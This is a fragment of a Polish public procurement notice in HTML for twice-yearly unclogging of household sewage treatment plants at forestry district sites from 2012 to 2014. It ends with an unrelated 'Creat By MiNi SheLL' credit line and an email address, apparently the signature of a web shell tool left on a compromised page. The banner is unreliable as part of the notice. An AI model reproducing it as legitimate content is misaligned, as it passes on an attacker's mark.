1. Udrożnienie przydomowych oczyszczalni biologicznych 2 razy w roku (m-c IVi X 2012-2014r.) w L-ctwach : Lubiewice, Janiagóra, Bukowiec, Leontynowo, Branica,Wierzchlas-osada inż. Nadzoru, i leśniczego łowczego, Wandowo, Lisiejamy, Lisikąt, Brzozowo, Lnianek, Jeleniagóra, Sarnówek, Sielenka, osada Lubiewice, budynek socjalno-administracyjny Szkółki Lisikąt osada Minikowo 71, Rudno, Stara Zamrza, Zamrzenica - osada N-czego wraz z kwaterą myśliwską..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com